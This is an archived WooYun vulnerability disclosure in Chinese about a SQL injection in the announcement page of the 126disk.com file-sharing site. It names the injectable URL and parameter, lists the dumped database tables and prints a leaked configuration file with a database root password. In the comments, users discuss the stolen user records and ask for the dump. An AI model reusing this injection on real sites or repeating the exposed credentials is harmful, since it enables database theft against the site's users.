当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02979

漏洞标题:126网盘猪肉

相关厂商:网易

漏洞作者: 我了个去

提交时间:2011-10-11 23:00

修复时间:2011-10-16 23:00

公开时间:2011-10-16 23:00

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:1

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-10-11: 细节已通知厂商并且等待厂商处理中
2011-10-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

公告处的一个猪肉,大家都懂得

详细说明:

http://www.126disk.com/gonggao.php?id=4
root权限,400disk库也可查看,也可以load file读任意文件,比如数据库配置文件
http://www.126disk.com/gonggao.php?id=-4 可以爆路径的 其实用google site 一下就可以发现很多warning ,不知有多少人在脱了吧?

漏洞证明:

inject:
Database: 126disk
[24 tables]
+------------------+
| disk_admin |
| disk_adminlog |
| disk_adminmsg |
| disk_collection |
| disk_count |
| disk_file |
| disk_gonggao |
| disk_guolv |
| disk_haoyou |
| disk_integral |
| disk_integrallog |
| disk_jubao |
| disk_link |
| disk_links |
| disk_message |
| disk_mulu |
| disk_search |
| disk_server |
| disk_tag |
| disk_type |
| disk_user |
| disk_userlog |
| disk_visitors |
| disk_zhuanji |
+------------------+
400disk跟126disk库结构基本一样吧,貌似就用户数量不一样
load file: class.php
$mysql_host = "localhost";
$mysql_user = "root";// 连接数据库用户名
$mysql_pass = "mysql.123!@#~";// 连接数据库密码
$mysql_data = "126disk";// 数据库的名字
$mysql_charset = "gbk";

修复方案:

你懂的

版权声明:转载请注明来源 我了个去@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2011-10-16 23:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2011-10-12 12:16 | Bloodwolf ( 实习白帽子 | Rank:47 漏洞数:8 | whoami)

    一共5W多裤头,不见得多少。

  2. 2011-10-20 15:46 | null ( 路人 | Rank:15 漏洞数:2 | 左岸是无法忘却的回忆,右岸是值得把握的青...)

    来晚了。。楼上求库!@@@ 好人一生平安。。